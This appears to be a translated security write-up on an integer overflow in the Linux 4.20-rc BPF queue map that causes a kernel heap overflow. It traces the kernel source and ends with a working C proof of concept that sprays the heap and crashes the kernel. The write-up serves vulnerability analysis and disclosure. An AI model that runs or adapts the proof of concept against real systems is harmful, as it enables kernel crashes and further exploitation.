An integer overflow in Linux kernel 4.20-rc1 through rc4 leads to a heap overflow

BPF

According to the description in man bpf:

Description:

The bpf() system call performs a range of operations related to extended Berkeley Packet Filters. eBPF is similar to classic BPF and is used to filter network packets. For both eBPF and classic BPF, the kernel statically analyzes the programs before loading them, in order to ensure that they cannot harm the running system.

eBPF design/architecture:

eBPF maps are a generic data structure for storing different types of data. The data is usually treated as a binary blob, so a user specifies the key size and the value size at map-creation time, which means a given key/value pair can have an arbitrary structure. A user process can create multiple maps and access them via file descriptors. Different eBPF programs can access the same maps in parallel, and it is entirely up to the user process and the eBPF programs to decide what gets stored in them.
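
As a concrete illustration (a minimal userspace sketch, not from the original text; it assumes an x86-64 system where <sys/syscall.h> provides __NR_bpf), creating an array map and storing one key/value pair through its file descriptor looks roughly like this:

#include <linux/bpf.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
    /* create an array map: 4-byte keys, 8-byte values, 16 entries */
    union bpf_attr create = {
        .map_type = BPF_MAP_TYPE_ARRAY,
        .key_size = 4,
        .value_size = 8,
        .max_entries = 16,
    };
    int map_fd = syscall(__NR_bpf, BPF_MAP_CREATE, &create, sizeof(create));
    if (map_fd < 0)
        return 1;

    /* store one key/value pair through the map's file descriptor */
    __u32 key = 3;
    __u64 value = 0x1234;
    union bpf_attr update = {
        .map_fd = map_fd,
        .key = (__u64)(unsigned long)&key,
        .value = (__u64)(unsigned long)&value,
        .flags = BPF_ANY,
    };
    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &update, sizeof(update));
}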

There is a special map type called a program array. This kind of map stores file descriptors referring to other eBPF programs. When a lookup is performed in such a map, program flow is redirected to the beginning of another eBPF program and does not return to the calling program. The nesting depth is capped at 32, so infinite loops cannot be constructed. At runtime, the file descriptors stored in the map can be modified, so program functionality can be altered to meet specific needs. All programs referenced in a program array must be loaded into the kernel in advance via the bpf system call. If a map lookup fails, the current program simply continues executing.

Each eBPF program is a set of instructions that is safe to run to completion. The in-kernel verifier statically determines that a program terminates and is safe to execute. During verification, the kernel increments the reference count of every map the program uses, so that an attached map cannot be removed before the program is unloaded.

Integer overflow

There are two ways to invoke the bpf system call:

#include <linux/bpf.h>
#include <unistd.h>
int bpf(int cmd, union bpf_attr *attr, unsigned int size);
syscall(__NR_bpf, cmd, attr, size);

However, the bpf() function does not appear to be declared in bpf.h, so it cannot be called directly; I therefore use the second approach and invoke syscall() myself.
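
For example (a minimal sketch; on recent kernels <sys/syscall.h> provides the __NR_bpf number), a thin wrapper around the raw syscall can stand in for the missing declaration:

#include <linux/bpf.h>
#include <unistd.h>
#include <sys/syscall.h>

/* libc does not export bpf(), so wrap the raw syscall ourselves */
static int bpf(int cmd, union bpf_attr *attr, unsigned int size)
{
    return syscall(__NR_bpf, cmd, attr, size);
}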

When cmd is BPF_MAP_CREATE (0), from the code below

SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
    union bpf_attr attr = {};
    int err;

    if (sysctl_unprivileged_bpf_disabled && !capable(CAP_SYS_ADMIN))
        return -EPERM;

    err = bpf_check_uarg_tail_zero(uattr, sizeof(attr), size);
    if (err)
        return err;
    size = min_t(u32, size, sizeof(attr));

    /* copy attributes from user space, may be less than sizeof(bpf_attr) */
    if (copy_from_user(&attr, uattr, size) != 0)
        return -EFAULT;

    err = security_bpf(cmd, &attr, size);
    if (err < 0)
        return err;

    switch (cmd) {
    case BPF_MAP_CREATE: <<-----------------------------------
        err = map_create(&attr);
        break;
    ......

we can see that map_create() is called to create a map.

Stepping into map_create():

static int map_create(union bpf_attr *attr)
{
    int numa_node = bpf_map_attr_numa_node(attr);
    struct bpf_map *map;
    int f_flags;
    int err;

    err = CHECK_ATTR(BPF_MAP_CREATE);
    if (err)
        return -EINVAL;

    f_flags = bpf_get_file_flag(attr->map_flags);
    if (f_flags < 0)
        return f_flags;

    if (numa_node != NUMA_NO_NODE &&
        ((unsigned int)numa_node >= nr_node_ids ||
         !node_online(numa_node)))
        return -EINVAL;

    /* find map type and init map: hashtable vs rbtree vs bloom vs ... */
    map = find_and_alloc_map(attr); <<----------------------------------
    ........

It calls find_and_alloc_map() to allocate the map.

Stepping into find_and_alloc_map():

static struct bpf_map *find_and_alloc_map(union bpf_attr *attr)
{
    const struct bpf_map_ops *ops;
    u32 type = attr->map_type;
    struct bpf_map *map;
    int err;

    if (type >= ARRAY_SIZE(bpf_map_types))
        return ERR_PTR(-EINVAL);
    type = array_index_nospec(type, ARRAY_SIZE(bpf_map_types)); <<------------- 1
    ops = bpf_map_types[type]; <<----------------- 2
    if (!ops)
        return ERR_PTR(-EINVAL);

    if (ops->map_alloc_check) {
        err = ops->map_alloc_check(attr);
        if (err)
            return ERR_PTR(err);
    }
    if (attr->map_ifindex)
        ops = &bpf_map_offload_ops;
    map = ops->map_alloc(attr); <<----------------- 3
    if (IS_ERR(map))
        return map;
    map->ops = ops;
    map->map_type = type;
    return map;
}

At 1 it sanitizes the user-supplied map_type (array_index_nospec() clamps the index to prevent speculative out-of-bounds access), at 2 it uses type as an index into bpf_map_types to fetch an ops structure holding several function pointers, and at 3 it calls the function that map_alloc points to.

If we pass BPF_MAP_TYPE_QUEUE as the map_type, the ops retrieved will be:

const struct bpf_map_ops queue_map_ops = {
    .map_alloc_check = queue_stack_map_alloc_check,
    .map_alloc = queue_stack_map_alloc,
    .map_free = queue_stack_map_free,
    .map_lookup_elem = queue_stack_map_lookup_elem,
    .map_update_elem = queue_stack_map_update_elem,
    .map_delete_elem = queue_stack_map_delete_elem,
    .map_push_elem = queue_stack_map_push_elem,
    .map_pop_elem = queue_map_pop_elem,
    .map_peek_elem = queue_map_peek_elem,
    .map_get_next_key = queue_stack_map_get_next_key,
};

So the function called at 3 is queue_stack_map_alloc().

Stepping into queue_stack_map_alloc():

static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
{
    int ret, numa_node = bpf_map_attr_numa_node(attr);
    struct bpf_queue_stack *qs;
    u32 size, value_size;
    u64 queue_size, cost;

    size = attr->max_entries + 1; <<--------------------- 1
    value_size = attr->value_size;

    queue_size = sizeof(*qs) + (u64) value_size * size;

    cost = queue_size;
    if (cost >= U32_MAX - PAGE_SIZE)
        return ERR_PTR(-E2BIG);

    cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;

    ret = bpf_map_precharge_memlock(cost);
    if (ret < 0)
        return ERR_PTR(ret);

    qs = bpf_map_area_alloc(queue_size, numa_node); <<------------------ 2
    if (!qs)
        return ERR_PTR(-ENOMEM);

    memset(qs, 0, sizeof(*qs));

    bpf_map_init_from_attr(&qs->map, attr);

    qs->map.pages = cost;
    qs->size = size;

    raw_spin_lock_init(&qs->lock);

    return &qs->map;
}

At 1, size = attr->max_entries + 1, where attr->max_entries is a u32 whose value is supplied by the user.

So if the user passes 0xffffffff, size wraps around to 0.

From queue_size = sizeof(*qs) + (u64) value_size * size; it follows that queue_size is then just sizeof(*qs), and this value is passed as a parameter to bpf_map_area_alloc().
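
To see the arithmetic concretely (a standalone userspace sketch; 48 is only a stand-in for sizeof(*qs), whose real value depends on the kernel build):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t max_entries = 0xffffffff;  /* attr->max_entries, user-controlled */
    uint32_t size = max_entries + 1;    /* u32 wrap-around: size == 0 */
    uint64_t value_size = 0x100;        /* attr->value_size */
    uint64_t qs_header = 48;            /* stand-in for sizeof(*qs) */
    uint64_t queue_size = qs_header + value_size * size;

    /* prints: size=0 queue_size=48 -- only the header gets allocated */
    printf("size=%u queue_size=%llu\n", size,
           (unsigned long long)queue_size);
    return 0;
}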

Stepping into bpf_map_area_alloc():

void *bpf_map_area_alloc(size_t size, int numa_node)
{
    /* We definitely need __GFP_NORETRY, so OOM killer doesn't
     * trigger under memory pressure as we really just want to
     * fail instead.
     */
    const gfp_t flags = __GFP_NOWARN | __GFP_NORETRY | __GFP_ZERO;
    void *area;

    if (size <= (PAGE_SIZE << PAGE_ALLOC_COSTLY_ORDER)) {
        area = kmalloc_node(size, GFP_USER | flags, numa_node);
        if (area != NULL)
            return area;
    }

    return __vmalloc_node_flags_caller(size, numa_node, GFP_KERNEL | flags,
                                       __builtin_return_address(0));
}

As we can see, this function allocates heap memory for the map according to size. Since queue_size here is only sizeof(*qs), well under PAGE_SIZE << PAGE_ALLOC_COSTLY_ORDER, the request is served by kmalloc_node() from a small slab cache.

At this point the picture is clear: the integer overflow in the function above causes the heap allocation to be smaller than what is actually needed.

Heap overflow

Returning to the first function: when cmd is BPF_MAP_UPDATE_ELEM (2),

......
switch (cmd) {
case BPF_MAP_CREATE:
    err = map_create(&attr);
    break;
case BPF_MAP_LOOKUP_ELEM:
    err = map_lookup_elem(&attr);
    break;
case BPF_MAP_UPDATE_ELEM:
    err = map_update_elem(&attr);
......

map_update_elem() is called:

static int map_update_elem(union bpf_attr *attr)
{
    void __user *ukey = u64_to_user_ptr(attr->key);
    void __user *uvalue = u64_to_user_ptr(attr->value);
    int ufd = attr->map_fd;
    struct bpf_map *map;
    void *key, *value;
    u32 value_size;
    struct fd f;
    int err;

    if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
        return -EINVAL;

    f = fdget(ufd);
    map = __bpf_map_get(f);
    if (IS_ERR(map))
        return PTR_ERR(map);

    if (!(f.file->f_mode & FMODE_CAN_WRITE)) {
        err = -EPERM;
        goto err_put;
    }

    key = __bpf_copy_key(ukey, map->key_size);
    if (IS_ERR(key)) {
        err = PTR_ERR(key);
        goto err_put;
    }

    if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
        map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
        map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
        map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
        value_size = round_up(map->value_size, 8) * num_possible_cpus();
    else
        value_size = map->value_size;

    err = -ENOMEM;
    value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);
    if (!value)
        goto free_key;

    err = -EFAULT;
    if (copy_from_user(value, uvalue, value_size) != 0)
        goto free_value;

    /* Need to create a kthread, thus must support schedule */
    if (bpf_map_is_dev_bound(map)) {
        err = bpf_map_offload_update_elem(map, key, value, attr->flags);
        goto out;
    } else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
               map->map_type == BPF_MAP_TYPE_SOCKHASH ||
               map->map_type == BPF_MAP_TYPE_SOCKMAP) {
        err = map->ops->map_update_elem(map, key, value, attr->flags);
        goto out;
    }

    /* must increment bpf_prog_active to avoid kprobe+bpf triggering from
     * inside bpf map update or delete otherwise deadlocks are possible
     */
    preempt_disable();
    __this_cpu_inc(bpf_prog_active);
    if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
        map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
        err = bpf_percpu_hash_update(map, key, value, attr->flags);
    } else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
        err = bpf_percpu_array_update(map, key, value, attr->flags);
    } else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
        err = bpf_percpu_cgroup_storage_update(map, key, value,
                                               attr->flags);
    } else if (IS_FD_ARRAY(map)) {
        rcu_read_lock();
        err = bpf_fd_array_map_update_elem(map, f.file, key, value,
                                           attr->flags);
        rcu_read_unlock();
    } else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
        rcu_read_lock();
        err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
                                          attr->flags);
        rcu_read_unlock();
    } else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
        /* rcu_read_lock() is not needed */
        err = bpf_fd_reuseport_array_update_elem(map, key, value,
                                                 attr->flags);
    } else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
               map->map_type == BPF_MAP_TYPE_STACK) {
        err = map->ops->map_push_elem(map, value, attr->flags); <<-------------
    } else {
        rcu_read_lock();
        err = map->ops->map_update_elem(map, key, value, attr->flags);
        rcu_read_unlock();
    }
    __this_cpu_dec(bpf_prog_active);
    preempt_enable();
    maybe_wait_bpf_programs(map);
out:
free_value:
    kfree(value);
free_key:
    kfree(key);
err_put:
    fdput(f);
    return err;
}

Since our map_type is BPF_MAP_TYPE_QUEUE, execution reaches the line marked by the arrow.

Per the queue_map_ops structure shown earlier, .map_push_elem points to queue_stack_map_push_elem.


Stepping into queue_stack_map_push_elem():

static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
                                     u64 flags)
{
    struct bpf_queue_stack *qs = bpf_queue_stack(map);
    unsigned long irq_flags;
    int err = 0;
    void *dst;

    /* BPF_EXIST is used to force making room for a new element in case the
     * map is full
     */
    bool replace = (flags & BPF_EXIST);

    /* Check supported flags for queue and stack maps */
    if (flags & BPF_NOEXIST || flags > BPF_EXIST)
        return -EINVAL;

    raw_spin_lock_irqsave(&qs->lock, irq_flags);

    if (queue_stack_map_is_full(qs)) {
        if (!replace) { <<-------------------- 1
            err = -E2BIG;
            goto out;
        }
        /* advance tail pointer to overwrite oldest element */
        if (unlikely(++qs->tail >= qs->size))
            qs->tail = 0;
    }

    dst = &qs->elements[qs->head * qs->map.value_size];
    memcpy(dst, value, qs->map.value_size); <<--------------------- 2

    if (unlikely(++qs->head >= qs->size))
        qs->head = 0;

out:
    raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
    return err;
}

struct bpf_queue_stack {
    struct bpf_map map;
    raw_spinlock_t lock;
    u32 head, tail;
    u32 size; /* max_entries + 1 */

    char elements[0] __aligned(8);
};

At 2 a memcpy leaps out. From the bpf_queue_stack structure we know that dst should point into an elements buffer of (u64) value_size * size bytes, yet we have made that buffer 0 bytes long.

value is a pointer we pass in, and value_size is what we supplied at map-creation time, so a heap overflow plainly occurs here: memcpy writes value_size bytes past the end of the undersized allocation.

Note that to avoid failing at 1 (with size 0 the map is always considered full), flags & BPF_EXIST must be nonzero.
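
Putting the two steps together, a minimal trigger looks like this (a sketch, not the original PoC; it assumes x86-64 with __NR_bpf from <sys/syscall.h> — the full PoC below adds the heap-spray step):

#include <linux/bpf.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(void)
{
    /* size = max_entries + 1 wraps to 0: only the header is allocated */
    union bpf_attr create = {
        .map_type = BPF_MAP_TYPE_QUEUE,
        .key_size = 0,                    /* queue maps take no key */
        .value_size = 0x100,
        .max_entries = 0xffffffff,
    };
    int fd = syscall(__NR_bpf, BPF_MAP_CREATE, &create, sizeof(create));
    if (fd < 0)
        return 1;

    /* BPF_EXIST bypasses the is-full check at 1; the push at 2 then
     * memcpy()s 0x100 bytes past the end of the undersized chunk */
    char buf[0x100];
    memset(buf, 'A', sizeof(buf));
    union bpf_attr push = {
        .map_fd = fd,
        .value = (__u64)(unsigned long)buf,
        .flags = BPF_EXIST,
    };
    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &push, sizeof(push));
}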

Exploitation

For exploitation, other researchers' writeups all use a flashy term, heap feng shui, which simply means arranging the heap into a layout that is convenient to exploit.

Given how the kernel heap allocator behaves, chunks of the same size are generally carved from the same slab, so if we allocate several more maps of the same size, there is a good chance these maps will end up adjacent to one another (the spray loop in the PoC below does exactly this).

Below is the PoC, which causes a kernel crash:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <linux/bpf.h>

#ifndef __NR_BPF
#define __NR_BPF 321 /* x86-64 */
#endif
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))

void die(char *ptr)
{
    perror(ptr);
    exit(-1);
}

int bpf_create_map(enum bpf_map_type map_type,
                   unsigned int key_size,
                   unsigned int value_size,
                   unsigned int max_entries)
{
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries};

    return syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, const void *key, const void *value,
                    uint64_t flags)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
        .flags = flags,
    };

    return syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int main()
{
    /* fixed mapping used as the source buffer for the overflowing memcpy */
    void *addr = mmap((void *)0x2000000, 0x10000, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (addr == MAP_FAILED)
        die("mmap");
    memset(addr, 0xff, 0x1000);

    /* max_entries = 0xffffffff: size wraps to 0, so only the
     * bpf_queue_stack header gets allocated */
    int fd = bpf_create_map(BPF_MAP_TYPE_QUEUE, 0, 0x100, 0xffffffff);
    if (fd < 0)
        die("bpf_create_map");

    /* spray maps of the same size so the undersized chunks land adjacent
     * to one another in the slab */
    int victim[0x20] = {0};
    for (int i = 0; i < 0x20; i++)
        victim[i] = bpf_create_map(BPF_MAP_TYPE_QUEUE, 0, 0x100, 0xffffffff);

    /* BPF_EXIST bypasses the is-full check; each push memcpy()s 0x100
     * bytes past the end of its chunk */
    bpf_update_elem(fd, 0, (void *)0x2000000, BPF_EXIST);
    for (int i = 0; i < 0x20; i++)
        bpf_update_elem(victim[i], 0, (void *)0x2000000, BPF_EXIST);

    return 0;
}

Conclusion

This vulnerability is quite interesting yet fairly simple, which would make it a nice CTF challenge.

References

http://p4nda.top/2019/01/02/kernel-bpf-overflow/

https://www.anquanke.com/post/id/166819#h3-6

http://www.man7.org/linux/man-pages/man2/bpf.2.html

https://elixir.bootlin.com/linux/v4.20-rc1